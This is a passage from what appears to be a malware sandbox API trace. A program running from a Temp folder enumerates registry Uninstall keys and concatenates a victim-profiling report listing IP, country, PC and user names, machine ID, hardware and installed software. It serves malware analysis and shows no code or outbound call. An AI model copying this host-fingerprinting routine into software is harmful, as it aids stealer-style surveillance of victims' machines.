12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 " [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0" [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n" [0175.946] RegCloseKey (hKey=0x354) returned 0x0 [0175.946] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x38, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.946] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 90 [0175.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.947] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x197fd4*=0x3d) returned 0x0 [0175.947] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned 60 [0175.947] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: 